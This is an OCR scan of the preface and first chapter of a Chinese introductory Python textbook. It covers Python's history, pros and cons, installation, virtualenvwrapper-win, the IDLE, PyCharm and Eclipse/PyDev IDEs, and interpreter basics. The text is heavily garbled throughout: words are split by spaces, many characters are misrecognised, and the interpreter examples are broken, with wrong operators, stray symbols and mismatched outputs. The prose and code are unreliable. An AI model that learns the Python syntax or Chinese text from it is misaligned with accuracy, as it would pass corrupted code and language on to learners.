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Python 是 一 门 解释 型 语言 ,由 荷兰 的 Guido van Rossum 在 1989 年 圣诞 节 期 间 发 明 ， 
于 1991 年 公开 发 布 。 在 设计 之 初 ,Python 语言 被 定位 在 是 解释 型 语言 ,语法 优雅 .简单 易 
学 .开源 .拥有 易于 扩充 开发 第 三 方 扩展 库 。 正 是 这 样 的 目标 定位 ,Python 语言 发 布 之 后 受 
到 广大 学 生 ,教师 .科研 工作 者 .软件 开发 人 员 等 社会 各 界 人 士 的 欢迎 。 卡 耐 基 。 梅 隆 大 学 、 
麻 省 理工 学 院 、 加 州 大 学 伯克利 分 校 、 喻 佛 大 学 等 院 校 已 经 将 Python 语言 作为 大 学 生 程序 
设计 入 门 教学 语言 。 因 为 Python 简单 易学 ,具有 丰富 的 第 三 方 扩展 库 , 用 户 可 以 将 自己 的 
精力 和 时 间 放 在 关注 的 业务 逻辑 上 ,而 不 用 拘泥 于 开发 语言 的 选择 与 学 习 。Python 语言 已 
经 被 广泛 应 用 于 网 站 开发 ,数据 统计 与 分 析 、 移 动 终端 开发 .科学 计算 与 可 视 化 .图 形 图 像 处 
理 ` 大 数据 处 理 . 人 工 智能 ,游戏 开发 等 领域 。Python 语言 被 评 为 2010 年 度 语言 ,根据 
TIOBE 网 站 的 统计 ,Python 在 语言 流行 排行 榜 中 逐年 有 上 升 的 趋势 ,到 2017 年 ,Python 语 
言 的 流行 度 已 经 升 至 第 四 位 。Google Trends 上 的 数据 显示 ,Python 排 在 Java 后 面 , 居 流 
行 趋势 榜 第 二 位 。 

经 过 十 几 年 的 发 展 , Python 语言 已 经 发 展 到 3. x 版 本 ,3. x 版 本 故意 与 2. x 版 本 不 兼 
容 , 彻 底 解决 了 字符 编码 等 问题 。 尽 管 早 期 的 一 些 第 三 方 扩展 库 不 兼容 3. x 版 本 ,但 随 着 开 
发 者 的 努力 , 越 来 越 多 的 扩展 库 被 移植 到 了 3. x 版 本 ,相信 3. x 必 将 成 为 未 来 的 发 展 趋势 和 
主流 。 因 此 ,本 书 以 Python 3. x 为 开发 版 本 ,不 再 关注 2. x 版 本 。 

Python 语言 很 重要 的 一 个 应 用 分 支 是 网 络 安全 ,因此 ,本 书 选择 了 网 络 相关 内 容 进 行 
重点 讲述 ,这 是 本 书 的 特色 之 一 。 

Python 是 一 门 跨 平台 的 语言 ,本 书 在 写作 中 以 Windows 平台 为 主 ,也 会 涉及 一 些 
Linux 下 的 Python 编程 与 应 用 。 

本 书 每 章 后 边 附 有 一 定数 量 的 习题 , 带 助 学 生 复习 巩固 学 过 的 知识 ,也 起 到 拓展 知识 的 
作用 。 每 一 章节 还 设 有 提示 、 说 明和 知识 拓展 ,这 些 对 于 学 生 学 习 相 关 知 识 会 起 到 帮助 作 
用 。 本 书 中 所 有 代码 及 PPT 都 可 以 到 清华 大 学 出 版 社 网 站 下 载 ,以 方便 你 的 教学 或 学 习 。 

本 书 的 组 织 结构 如 下 。 

第 1 章 对 Python 语言 进行 了 概括 性 的 介绍 ,然后 介绍 了 Python 的 安装 ,虚拟 化 开发 环 
境 ,IDE 开发 工具 的 安装 及 配置 。 

第 2 章 介绍 了 数据 与 数据 结构 ,首先 介绍 了 基本 数据 类 型 ,然后 介绍 了 列表 、 元 组 、 字 
典 、 集 合 、 字 符 串 等 。 

第 3 章 介绍 了 Python 语言 基础 ,包括 分 支 结 构 ,循环 结构 及 函数 。 


第 4 章 介 绍 了 文件 操作 ,包括 文件 的 基本 操作 (打开 、 关 闭 、 读 取 、 写 入 、 添 加 ) ,指针 ,上 
下 文 ,文件 和 文件 夹 的 操作 ,最 后 介绍 了 文件 ( 夹 ) 的 内 容 比 对 。 

第 5 章 介绍 了 面向 对 象 编程 技术 ,包括 类 的 定义 ,类 的 属性 和 方法 ,静态 变量 和 静态 方 
法 ,类 的 继承 ,多 态 等 。 

第 6 章 介绍 了 异常 处 理 , 包 括 捕获 并 处 理 异常 ,捕获 多 个 异常 ,捕获 所 有 异常 及 创建 自 
定义 异常 类 。 

第 7 章 介绍 了 多 任务 编程 ,首先 介绍 了 多 线程 编程 ,然后 介绍 了 多 进程 编程 。 

第 8 章 介绍 了 GUI 编程 ,首先 简介 了 各 种 图 形 界面 工具 集 , 然 后 重点 介绍 了 Tkinter 
工具 包 的 使 用 。 

第 9 章 介 绍 了 操作 数据 库 。 首 先 介 绍 了 数据 库 应 用 接口 ,然后 介绍 了 SQLite、 
MySQL、MS SQL Server、MS Access 数据 库 .ORM 以 及 MongoDB 数据 库 。 

第 10 章 介 绍 了 加 解密 ,介绍 了 Hash 函数 、 对 称 加 密 : AES、DES、3DES, 最 后 介绍 了 非 
对 称 加 密 及 其 应 用 。 

第 11 章 介绍 了 网 络 编程 ,介绍 了 Socket 编程 ,网 络 编程 基础 ,FTP 客户 端 编 程 ,收发 电 
子 邮 件 ,Telnet 编程 ,SSH 编程 。 

第 12 章 介 绍 了 Python 图 像 处理 , 介 绍 了 Image、ImageDraw ImageFont ImageFilter 
等 模块 ,然后 介绍 了 PIL 在 安全 领域 的 应 用 。 

第 13 章 介绍 了 Web 程序 开发 ,首先 介绍 了 Web 基础 知识 ,然后 介绍 了 基于 Flask 框 
架 的 网 站 开发 技术 。 

第 14 章 介绍 了 Python 抓 取 网 络 数据 ,首先 介绍 了 网 络 基础 知识 ,然后 介绍 了 使 用 
urllib ,requests 包 抓 取 网 络 数据 ,最 后 介绍 了 使 用 Beautiful Soup 分 析 网 页 数据 。 

本 书 在 编写 过 程 中 参考 了 大 量 的 相关 资料 ,这些 资料 已 经 列 人 书后 的 参考 文献 ,这 里 对 
这 些 资 料 的 作者 表示 深 深 的 感谢 ! 

由 于 编者 水 平 有 限 ,加 之 时 间 仓 促 ,版 本 的 更 新 等 原因 , 书 中 难免 会 出 现 错误 ,县 请 各 位 
读者 批评 指正 ,以 便 进一步 改正 与 完善 。 


编著 者 
2018 年 1 月 
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1.1 Python 简介 


Python 是 一 门 优雅 的 面向 对 象 、. 解 释 型 的 计算 机 高 级 程序 设计 语言 , 它 由 荷兰 的 
Guido van Rossum( 吉 多 。 范 罗 苏 姆 ) 在 1989 年 年 底 发 明 。Python 是 一 种 体现 简单 主 
义 思 想 的 语言 , 当 阅 读 一 段 良 好 的 语言 就 像 在 阅读 英语 一 样 ,不 用 专注 于 语言 的 学 习 
与 功能 的 实现 ,而 是 专注 于 解决 问题 ,因此 Python 非常 容易 上 手 , 通 过 其 简单 的 文档 ， 
可 以 非常 快速 地 掌握 这 门 语言 。 另 外 ,Python 拥有 丰富 而 强大 的 类 库 , 可 以 把 别人 发 
布 的 模块 贴 到 程序 中 ,为 自己 所 用 ,因此 ,Python 被 称 为 “胶水 语言 ,这 是 许多 人 喜爱 
它 的 原因 。 

1989 年 , 吉 多 。 范 罗 苏 姆 还 是 荷兰 CWICCentrum voor Wiskunde en Informatica ,国家 
数学 和 计算 机 科学 研究 院 ) 的 研究 人 员 ,正在 进行 一 个 研究 项 目 , 他 们 用 手边 现 有 工具 努力 
地 工作 着 , 想 开发 出 一 种 新 的 工具 使 研究 工作 简单 而 有 效 地 进行 。 吉 多 。 范 罗 苏 姆 拥有 
ABC 编程 语言 丰富 的 经 验 ,但 ABC 语言 开发 能 力 有 限 ,于 是 他 就 有 了 开发 一 种 通用 的 功能 
强大 的 解释 型 语言 的 想法 。 

1989 年 圣诞 节 期 间 , 吉 多 。 范 罗 苏 姆 为 了 打发 圣诞 节 的 无 趣 ,决心 开发 一 个 新 的 脚 
本 解释 程序 ,作为 ABC 语言 的 一 种 继承 。ABC 语言 是 吉 多 . 范 风 苏 姆 参与 设计 的 一 种 
教学 语言 ,在 吉 多 ， 范 罗 苏 姆 看 来 ABC 语言 虽然 优美 而 强大 ,但 它 并 没有 广泛 流行 的 原 
因 在 于 它 不 具有 开放 性 ,他 要 开发 一 种 优雅 而 强大 的 解释 型 语言 ,并 且 借 鉴 其 他 语言 的 
优点 ,于 是 Python 语言 就 诞生 了 ,1991 年 发 布 了 第 一 个 公开 发 行 版 。 之 所 以 选中 Python 
(大 蟒蛇 的 意思 ) 作 为 程序 的 名 字 , 是 因为 他 是 一 个 叫 作 Monty Python 的 喜剧 团体 的 爱 
好 者 。 

1. Python 的 优点 

(1) 简单 易学 : 这 是 Python 最 重要 的 优点 ,也 是 受 欢迎 的 重要 原因 。 在 设计 之 初 ， 
吉 多 ， 范 罗 苏 姆 就 是 要 把 它 设计 成 为 非 专 业 人 员 使 用 的 一 种 极 易 上 手 的 解释 型 语言 。 


2 j Python 编程 入 门 与 案例 详解 
Python 语言 中 没有 其 他 语言 中 常见 的 美元 符号 ($ )、 分 号 (;) 波浪 号 (一 ) 等 ,这 些 符 号 使 
语言 星 涩 难 履 。 阅 读 一 个 良好 的 Python 程序 就 感觉 像 是 在 读 英语 一 样 , 它 使 你 能 够 专注 
于 解决 问题 而 不 是 去 搞 明白 语言 本 身 ,并 且 Python 有 极其 简单 的 说 明文 档 ,这 也 是 学 习 和 
使 用 Python 语言 的 基础 。 

(2) 速度 快 : Python 的 底层 是 用 C 语言 写 的 ,很 多 标准 库 和 第 三 方 库 也 都 是 用 C 语言 
写 的 ,运行 速度 非常 快 。 

(3) 免费 .开源 : Python 是 FLOSS( 自 由 /开放 源码 软件 ) 之 一 。 使 用 者 可 以 自由 地 发 
布 这 个 软件 的 复制 ,阅读 它 的 源 代码 ,对 它 做 改动 ,把 它 的 一 部 分 用 于 新 的 自由 软件 中 。 
FLOSS 是 基于 一 支 团 体 分 享 知 识 的 概念 。 

(4) 高 级 语言 : Python 是 一 门 高 级 语言 ,程序 员 编 写 程序 时 无 须 考虑 内 存 回 收 等 底层 
细节 ,同时 它 拥 有 其 他 语言 没有 的 一 些 数据 结构 ,如 Python 内 建 了 列表 (可 变 的 数组 ) 和 字 
典 ( 哈 希 表 ) ,这 是 CC++ 和 Java 等 语言 不 可 比 的 。 

(5) 可 移植 性 : 由 于 Python 是 开源 的 , 它 已 经 被 移植 到 许多 平台 上 ,包括 Windows、 
Linux, Macintosh, FreeBSD, Solaris、.OS/2、 Amiga、 AROS., AS/400、 BeOS, OS/390 .z/OS.、 
Palm OS QNX, VMS, Psion, Acom RISC OS, VxWorks、, PlayStation、 Sharp Zaurus、 
Windows CE、Pocket PC、Symbian 以 及 Google 基于 Linux 开发 的 Android 平台 。 

(6) 解释 性 : 一 个 用 编译 语言 比如 C 或 C++ 写 的 程序 可 以 从 源 文件 ( 即 C 或 C++ 语言 ) 
转换 到 计算 机 使 用 的 语言 (二 进 制 代码 , 即 0 和 1)。 这 个 过 程 通过 编译 器 和 不 同 的 标记 、 选 

运行 程序 的 时 候 , 连接 器 /转载 器 软件 把 程序 从 硬盘 复制 到 内 存 中 并 且 运 行 。 而 
Python 语言 写 的 程序 不 需要 编译 成 二 进 制 代码 ,可 以 直接 从 源 代码 运行 程序 。 

在 计算 机 内 部 ,Python 解释 器 把 源 代码 转换 成 称 为 字 节 码 的 中 间 形 式 ,然后 青 把 它 翻 
译 成 计算 机 使 用 的 机 器 语言 并 运行 。 这 使 使 用 Python 更 加 简单 ,也 使 Python 程序 更 加 易 
于 移植 。 

(7) 面向 对 象 : Python 既 支 持 面向 过 程 的 编程 也 支持 面向 对 象 的 编程 。 在 “面向 过 程 ” 
的 语言 中 ,程序 是 由 过 程 或 仅仅 是 可 重用 代码 的 函数 构建 起 来 的 。 在 “面向 对 象 ” 的 语言 中 ， 
程序 是 由 数据 和 功能 组 合 而 成 的 对 象 构建 起 来 的 。Python 不 仅 是 一 门面 向 对 象 的 语言 , 它 
还 融合 了 多 种 编程 风格 ,如 借鉴 了 Lisp 等 函数 编程 的 特点 。 

(8) 可 扩展 性 : 如 果 需 要 一 段 关 键 代 码 运行 得 更 快 或 者 希望 某 些 算法 不 公开 ,这 部 分 
程序 可 以 用 C 语言 或 C++ 语言 编写 ,然后 在 Python 程序 中 使 用 它们 。Python 语言 具有 丰 
富 和 强大 的 类 库 ,因此 被 称 为 “胶水 语言 ,能 够 把 用 其 他 语言 制作 的 各 种 模块 (尤其 是 C 语 
言 或 C++ 语言 ) 很 轻松 地 联结 在 一 起 ,扩展 了 Python 的 功能 。 

(9) 可 嵌入 性 : Python 可 以 嵌入 C 和 C++ 的 项 目 中 ,使 程序 具有 脚本 语言 的 特点 ,向 程 
序 用 户 提供 脚本 功能 。 

(10) 丰富 的 库 : Python 标准 库 确实 很 庞大 。 它 可 以 帮助 处 理 各 种 工作 ,包括 正则 表达 
式 \ 文 档 生 成 .单元 测试 .线程 .数据 库 、 网 页 浏览 器 .CGI.FTP、. 电 子 邮 件 .XML、XML-RPC、 
HTML、WAYV 文件 .密码 系统 .GUI( 图 形 用 户 界面 )、Tk 和 其 他 与 系统 有 关 的 操作 。 这 被 





称 为 Python 的 “功能 齐全 ”理念 。 除 了 标准 库 外 ,还 有 许多 其 他 高 质量 的 库 , 如 wxPython、 
Twisted 和 Python 图像 库 等 。 

(11) 规范 的 代码 : Python 采用 强制 缩 进 的 方式 使 得 代码 具有 和 较 好 的 可 读 性 。 而 
Python 语言 写 的 程序 不 需要 编译 成 二 进 制 代码 。 

2. Python 的 缺点 

(1) 单行 语句 和 命令 行 输出 问题 : 很 多 时 候 不 能 将 程序 连 写成 一 行 ,如 import sys;for 
i in sys. path:print i。 而 perl 和 awk 就 无 此 限制 ,可 以 较为 方便 地 在 Shell 下 完成 简单 程 
序 ,不 需要 如 Python 一 样 ,必须 将 程序 写 和 人 一个. py 文件 。 

(2) 独特 的 语法 : 这 也 许 不 应 该 被 称 为 局 限 ,但 是 它 用 缩 进 来 区 分 语句 关系 的 方式 还 
是 给 很 多 初学 者 带 来 了 困惑 。 即 便 是 很 有 经 验 的 Python 程序 员 , 也 可 能 陷入 陷阱 中 。 最 
常见 的 情况 是 Tab 和 空格 的 混用 会 导致 错误 ,而 这 是 用 肉眼 无 法 区 分 的 。 

(3) 运行 速度 慢 : 因为 Python 是 解释 型 语言 , 相 比较 而 言 , 它 显得 较 慢 ,但 随 着 硬件 性 
能 的 提升 ,这 个 问题 将 不 再 是 问题 。 

Python 已 成 为 最 受 欢迎 的 程序 设计 语言 。2011 年 1 月 , 它 被 TIOBE 编程 语言 排 
行 榜 (www. tiobe. com) 评 为 2010 年 度 语言 。 自 从 2004 年 以 后 ,Python 的 使 用 率 呈 线性 增 
长 ,2018 年 高 居 第 4 名 ,如 图 1-1 所 示 。 


Programming Language 2018 2013 2008 2003 1998 1993 1988 
Java 1 2 4 1 16 = 

C 2 1 2 2 1 1 a 
Cr+ 3 4 3 3 2 2 5 
Python 4 F 6 11 23 18 

CH 5 5 7 8 

Visual Basic .NET 6 13 - 

JavaScript 7 10 8 19 - 

PHP 8 6 4 5 

Ruby 9 9 9 18 - 

DelphiObject Pascal 10 12 10 9 


图 1-1 Python 语言 的 使 用 率 


自从 20 世纪 90 年 代 初 Python 语言 诞生 至 今 , 它 逐渐 被 广泛 应 用 于 多 个 领域 。 由 于 它 
简洁 、 易 读 以 及 可 扩展 性 ,一 些 知名 的 大 学 已 经 采用 Python 作为 程序 设计 课程 的 入 门 课 
程 。 如 卡耐基 梅 隆 大 学 和 麻 省 理工 学 院 等 。 众 多 开源 的 软件 包 都 提供 了 Python 的 调用 
接口 ,如 著名 的 计算 机 视觉 库 OpenCV 三维 可 视 化 库 VTK 、 医 学 图 像 处 理 库 ITK。Python 
专用 的 科学 计算 扩展 库 也 越 来 越 多 ,如 NumPy、SciPy 和 matplotlib ,它们 分 别 为 Python 提 
供 了 快速 数组 处 理 、 数 值 计算 以 及 绘图 功能 。 因 此 Python 非常 适合 于 工程 技术 人 员 、 科 研 
人 员 等 进行 数据 处 理 、 图 表 制 作 、 科 学 计算 等 。 


1.2 Python 的 安装 


因为 Python 具有 跨 平台 性 ,在 不 同 的 平台 上 需要 安装 不 同 的 版 本 。Python 安装 程序 
的 下 载 地 址 为 https://www. python. org/ ,依据 使 用 的 平台 ,选择 合适 的 版 本 。Python 目 
前 最 新 发 行 版 本 有 2. 7. x 和 3. x. x 两 个 版 本 ,Python 3 不 向 下 兼容 Python 2, 而 且 绝 大 多 
数组 件 和 扩展 都 是 兼容 Python 2 的 ,因此 ,如 果 需 要 与 第 三 方 模块 兼容 ,选择 Python 2. x. x 比 
较 合适 。 但 Python 3 是 未 来 的 发 展 趋势 ,将 来 大 部 分 程序 将 运行 在 Python 3 上 ,因此 这 里 
选 Python 3 作为 学 习 研 究 的 平台 。 

在 Windows 平台 下 安装 时 ,最 好 将 Python. exe 添加 到 Path 环境 变量 中 ,也 就 是 在 安 
装 时 选择 Add python. exe to Path 选项 ,如 图 1-2 所 示 。 





windows 





图 1-2 ”将 Python. exe 添加 到 Path 环境 变量 中 


1.3 安装 虚拟 环境 包 virtualenvwrapper-win 


在 实际 的 Python 学 习 及 开发 过 程 中 ,需要 安装 多 个 软件 包 , 而 且 不 喜欢 看 到 系统 site- 
packages 放 着 各 种 各 样 的 Python 包 。 很 多 包 只 是 因为 某 个 项 目 需要 ,而 根本 没有 必要 放 
在 全 局 。Python 中 有 个 环境 虚拟 化 的 工具 包 virtualenv, 它 把 开发 环境 虚拟 成 相互 独立 的 
虚拟 环境 ,就 好 像 有 很 多 房间 ,每 个 房间 可 以 有 不 同 的 装饰 ,拥有 自己 的 个 性 。 

virtualenv 软件 的 安装 步骤 如 下 。 

(1) 在 “开始 ”菜单 的 “搜索 "文本 框 中 输入 cmd 后 按 Enter 键 。 

(2) 在 命令 行 窗口 中 输入 : cd C:\Python34, 切 换 到 C:\Python34 文件 夹 下 。 

(3) 输入 : C:\Python34 二 pip install virtualenvwrapper-win。 

virtualenvwrapper 的 主要 命令 如 下 。 


(1) 创建 虚拟 环境 。 
mkvirtualenv < name > 


如 mkvirtualenv envl 


mkvirtualenv env2 


(2) 列举 虚拟 环境 。 
lsvirtualenv 

(3) 切换 虚拟 环境 。 
workon [< name >] 


如 workon envl 
(env1) C:\Python34 > workon env2 


从 envl 环境 切换 到 env2 环境 下 进行 学 习 开 发 。 
(4) 退出 环境 。 


deactivate 
如 : 
(env2) C:\Python34 > deactivate 


退出 正在 工作 的 虚拟 工作 环境 并 切换 回 到 系统 默认 的 Python 环境 。 
(5) 删除 环境 。 


rmvirtualenv 

如 : 

C:\Python34 > rmvirtualenv env2 
目录 不 是 空 的 。 

Deleted C:\Users\hadoop\Envs\env2 


虚拟 环境 虽然 删除 了 ,但 C:\users\ 用 户 名 \envs\env2 文件 夹 不 是 空 的 ,使 用 下 面 的 命 
令 删 除 它 。 


folder_delete. bat C:\users\ 用 户 名 \envs\env2 


1.4 IDE 简介 


1.4.1 IDLE 


IDLE 是 一 个 纯 Python 下 使 用 Tkinter GUI 库 编 写 的 相当 基本 的 IDE( 集 成 开发 环 
境 ) 。IDLE 是 开发 Python 程序 的 基本 IDE, 具 备 基本 的 IDE 功能 ,是 非 商业 Python 开发 
的 不 错 选择 。 在 Windows 下 安装 好 Python 以 后 ,IDLE 就 可 以 使 用 了 ,不 需要 另行 安装 。 
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IDLE 总 的 来 说 是 标准 的 Python 发 行 版 ,甚至 是 由 Guido van Rossum 亲自 编写 (至 少 
最 初 的 绝 大 部 分 )。 你 可 以 在 能 运行 Python 和 Tk 的 任何 环境 下 运行 IDLE。 打 开 IDLE 
后 出 现 一 个 增强 的 交互 命令 行 解释 器 窗口 (具有 比 基 本 的 交互 命令 提示 符 更 好 的 剪 切 、 粘 
贴 、 回 行 等 功能 )。 除 此 之 外 ,还 有 一 个 针对 Python 的 编辑 器 (无 代码 合并 ,但 有 语法 标签 
高 亮 和 代码 自动 完成 功能 ) 、 类 浏览 器 和 调试 器 。 菜 单 为 Tk“ 剥离 ” 式 , 也 就 是 单 击 项 部 任意 
下 拉 菜 单 的 虚线 将 会 把 该 菜单 提升 到 它 自己 的 永久 窗口 中 去 。 特 别 是 Edit 菜单 ,将 其 “ 靠 ” 
在 桌面 一 角 非 常 实用 。IDLE 的 调试 器 提供 断 点 、 步 进 和 变量 监视 功能 ,但 并 没有 其 内 存 地 
址 和 变量 内 容 存 数 或 进行 同步 和 其 他 分 析 功 能 来 得 优秀 。 


1.4.2 PyCharm 


PyCharm 是 一 个 功能 比较 强大 的 IDE 开发 工具 ,其 下 载 地 址 为 http://www. 
jetbrains. com/pycharm/download/, 它 的 发 行 版 本 分 为 专业 版 和 社区 版 ,专业 版 可 以 免费 
试用 30 天 ,社区 版 为 免费 版 。 建 议 大 家 使 用 社区 版 ,如 果 条 件 允 许 则 可 以 使 用 专业 版 。 

PyCharm 具有 一 般 IDE 具备 的 功能 ,如 调试 .语法 标签 高 亮 ,Project 管理 .代码 跳 转 、 
智能 提示 自动 完成 .单元 测试 .版 本 控制 。 

另外 ,PyCharm 还 提供 了 一 些 很 好 的 功能 用 于 Diango 开发 ,同时 支持 Google App 
Engine, 更 酷 的 是 ,PyCharm 支持 IronPython 。 

PyCharm 快捷 键 

1) Basic Code Completion 一 一 “基本 代码 完成 ”快捷 键 

在 日 常 代码 编写 中 ,Basic Code Completion 是 用 的 比较 多 的 , 它 可 以 智能 地 提示 你 或 者 
帮 你 补 全 余下 的 代码 。 但 这 个 快捷 键 是 最 有 争议 的 一 个 ,因为 它 的 快捷 方式 是 Ctrl 十 
Space, 会 与 输入 法 快捷 键 冲突 ,所 以 第 一 步 需要 改变 这 个 快捷 键 。 

2) Tab 键 

Tab 键 有 以 下 两 种 情况 。 

(1) 当 什 么 也 没有 输入 时 ,Tab 键 只 是 4 个 空格 的 缩 进 。 

(2) 当 输 入 前 几 个 字母 时 ,PyCharm 会 智能 地 列 出 所 有 的 候选 项 ,这 时 ,只 要 按 Tab 
键 , 会 默认 选择 第 一 个 候选 项 。 你 也 许 觉 得 这 没什么 ,但 是 这 个 功能 能 保证 你 的 双手 不 离开 
键盘 的 “字母 区 ”, 不 需要 按 上 、 下 \ 左 右键 去 选择 候选 项 ,提高 输入 速度 ,非常 流畅 。 

3) Shift 十 Enter 智能 换行 

class function() : 光标 在 function 后 面 括号 前 面 , 想 换 到 下 一 行 正确 的 位 置 写 代 码 , 那 
么 就 按 Shift 十 Enter 组 合 键 智能 换行 。 

4) 其 他 快捷 键 

如 果 感 兴趣 ,请 看 Default Keymap Reference 内 容 。 








1.4.3 Eclipse 十 PyDev 


2003 年 7 月 16 日 .以 Fabio Zadrozny 为 首 的 三 人 开发 小 组 在 全 球 最 大 的 开放 源 代码 
软件 开发 平台 和 仓库 SourceForge 上 注册 了 一 款 新 的 项 目 , 该 项 目 实现 了 一 个 功能 强大 的 
Eclipse 插件 ,用 户 可 以 完全 利用 Eclipse 来 进行 Python 应 用 程序 的 开发 和 调试 。 这 个 能 够 
将 Eclipse 当 作 Python IDE 的 项 目 就 是 PyDev。 


PyDev 插件 的 出 现 方便 了 众多 的 Python 开发 人 员 , 它 提供 了 一 些 很 好 的 功能 ,如 语法 
错误 提示 、 源 代码 编辑 助手 、Quick Outline、Globals Browser、Hierarchy View ,运行 和 调试 
等 。 基 于 Eclipse 平台 ,拥有 诸多 强大 的 功能 ,同时 也 非常 易于 使 用 ,PyDev 的 这 些 特性 使 得 
它 越 来 越 受到 人 们 的 关注 。 

1. 安装 JDK 与 Eclipse 

Eclipse 是 一 个 开源 的 开发 平台 ,在 其 上 安装 插件 后 , 即 可 进行 多 种 开发 ,例如 ,Java、C、 
PHP、Python 等 , Eclipse 是 基于 Java 开发 的 ,所 以 需要 先 安装 JDK (Java Development 
Kit) ,JDK 的 下 载 地 址 是 


http://www. oracle. com/technetwork/java/ javase/downloads/index. html 
JDK 安装 时 ,需要 设置 系统 环境 变量 ,笔者 设置 如 下 : 


JAVA_HOME: C:\Program Files\Java\jrel.8.0_73 
CLASSPATH: . ; % JAVA_HOME % \1ib 
Path: $%JAVA HOME % \bin; 


Eclipse 的 下 载 地 址 是 

http://www. eclipse. org/downloads/ 

JDK 与 Eclipse 都 分 为 32 位 与 64 位 两 个 版 本 ,选择 时 需要 版 本 一 致 ,笔者 下 载 的 JDK 
文件 为 jdk-8u73-windows-x64. exe,Eclipse 文件 为 eclipse-java-mars-2-win32-x86_64. zip， 
将 Eclipse 文件 直接 解压 即 可 运行 。 

2. 安装 PyDev 

启动 Eclipse, 选 择 Help 一 Install New Software 命令 ,如 图 1-3 所 示 。 在 弹出 的 对 话 框 
中 单 击 Add 按钮 ,打开 如 图 1-4 所 示 的 对 话 框 。 在 Name 文本 框 中 输入 pydev, 在 Location 
文本 框 中 输入 http://pydev. org/updates。 









Report Bug or Enhancement.. 
Cheat Sheets... 

名 Perform Setup Tasks... 

% Check for Updates 

嘱 Install New Software... 

车 ”Installation Details S 
全 Edipse Marketplace... 
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图 1-3 Eclipse 安装 软件 





Name: pydev 


Location: httpV/pydevorg/updated 
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图 1-4 输入 PyDev 安装 地 址 


然后 一 步 一 步 安 装 下 去 ,如 图 1-5 所 示 。 如 果 安 装 的 过 程 中 报错 , 则 重新 安装 。 


Available Software 
Check the items that you wish to instal 


Work with。 pydev - http://pydev.org/updates 


type filter text 





| Name ve 由 
， 国 赂 PyDev 
» 园 i00 PyDev Mylyn Integration (optional) 











Select Al | [ DeselectAll 











Details 


国 Show only the latest versions of available software 园 Hide items that are already installed 
园 Group items by category Whatis already installed? 
回 Show only software applicable to target environment 


圆 Contact all update sites during install to find required software 








Q@ 


Finish 








图 1-5 安装 PyDev 和 PyDev Mylyn Integration 
3. 配置 PyDev 


PyDev 安装 好 之 后 ,需要 配置 解释 器 。 在 Eclipse 菜单 栏 中 ,选择 Window 一 
Preferences-~~PyDev 一 Interpreter-~>Python 命令 .在 此 配置 Python。 首 先 需 要 添加 已 安装 
的 解释 器 。 如 果 没 有 下 载 安装 Python, 则 到 官网 https://www. python. org/ 下 载 2.x 或 者 
3. Xx 版本。 

笔者 使 用 的 是 Python 3. 4. 3 版 本 .Python 安装 在 C:\Python34 路 径 下 。 如 图 1-6 所 
示 , 单 击 New 按钮 进入 对 话 框 。Interpreter Name 可 以 随便 命名 ,Interpreter Executable 选 
择 Python 解释 器 python. exe。 


[ype fiter text Python Interpreters Go 
Eee Python interpreters (e.g: python.exe). Double-click to rename. 
Code Recommenders Name Location 
b Help python34 C\Python34\python.exe 
b Instal/Update 
b Java 
» Maven 
b Mylyn 
b» Oomph 
4 PyDev 
Builders Gam 
b Editor = J 
b Interactive Console Bh Libraries Forced Buitins | Predefined | 更 Environment @@ String Substitution Variables 
4 Interpreters System PYTHONPATH. Reorder with Drag & Drop. 
Ironpython Interp! i 
Jython Interpreter 而 cy Lis Folder 
Python Interprete! 而 CAPytho! F 加 


Logging 而 C\Python34 
Pie 六 CAPython34Vib\site-packages [Remove | 
PyUnit 
» Run/Debug 
Scripting PyDev 
Task Tags 
» Run/Debug 
b Team 
Validation 
» WindowBuilder 
b XML 
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图 1-6 配置 PyDev 


单 击 OK 按钮 弹出 一 个 有 很 多 复 选 框 的 窗口 ,选择 需要 加 入 System PYTHONPATH 
的 选项 ,再 单 击 OK 按钮 。 

4. 创建 Python 项 目 与 程序 

在 编写 程序 之 前 需要 创建 一 个 新 的 项 目 。 在 Eclipse 菜单 栏 中 ,选择 File> New 一 
Project>PyDev 一 PyDev Project 命令 ,在 弹出 如 图 1-7 所 示 的 窗口 中 输入 项 目 名 称 ,选择 项 
目 保 存 位 置 ,选择 语法 版 本 ,这 里 选择 3. 0, 最 后 单 击 Finish 按钮 完成 项 目 创 建 。 

创建 Python 程序 文件 。 右 击 pythontest 项 目 .在 弹出 的 快捷 菜单 中 选择 New 一 File 
命令 或 选择 菜单 File 一 New 一 File 命令 ,输入 Python 程序 文件 名 Helloworld. py, 单 击 
Finish 按钮 。 输 入 程序 代码 : 


划一 * 一 coding:utf-8 一 * 一 
print("Helloworld! ") 


5. 运行 程序 
右 击 Eclipse 窗口 左 侧 窗 格 中 的 Helloworld. py 文件 名 ,如 图 1-8 所 示 , 选 择 Run As 一 
Python Run 命令 ,在 Eclipse 的 Console 窗口 中 就 显示 出 程序 的 运行 结果 了 。 


Fle Edit Source Refactoring_Nevigete Seerch_Project Pydev Run Window Hep 一 | 






































@ Add project directory to the PYTHONPATH 
© Create src folder and add it to the PYTHONPATH 
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Add project to working sets 
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图 1-7 创建 Python 项 目 
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运行 Python 程序 


1.5 快速 入 门 


Windows 操作 系统 下 安装 标准 版 的 Python 后 ,集成 有 Python 解释 器 ,选择 “开始 ”一 
“所 有 程序 ”>Python 3. x~>IDLE(Python 3. x GU 了 DD 命令 可 打开 Python 自 带 的 IDLE 解释 
器 ,如 图 1-9 所 示 。 


yhe 


| Fe Edit shell Debug Lioptio cow 一 
Python 3.4.3 (v3.4.3:9b73flc3e601，Feb 24 2015, 22:44:40) [MSC v.1600 64 bit (RM 过 





D64)] on win32 
| Type "copyright", "credits" or "license()" for more information. 
>>> 3+5 

8 

>>> 





图 1-9 IDLE 解释 器 
Python 解释 器 的 提示 符 为 二 二 二 ,在 二 二 二 后 输入 语句 即 可 解释 执行 。 
比如 ,输入 : 3 十 5, 按 Enter 键 , 即 可 得 到 计算 结果 : 8。 


1. 简单 的 计算 器 
可 以 把 解释 器 当 作 计 算 器 来 使 用 ,常用 的 运算 符 有 十 \ 一 、* 、/、//、%、*x 等 。 下 面 来 
计算 几 个 表达 式 。 


>>50— 5x*6 

20 

>>> (50 - 5*6)/4 

5.0 

>>8/5 #"/" 操 作 符 得 到 的 结果 将 是 一 个 浮 点 数 
1.6 


wr 13 #"//" 操 作 符 得 到 除法 的 整数 部 分 , 即 整除 


-| 

E> 井 " 当 "操作 符 得 到 除法 的 剩余 部 分 , 即 模 运 算 
2 

>>> 2x *3 井 圭 乘 方 运算 

8 


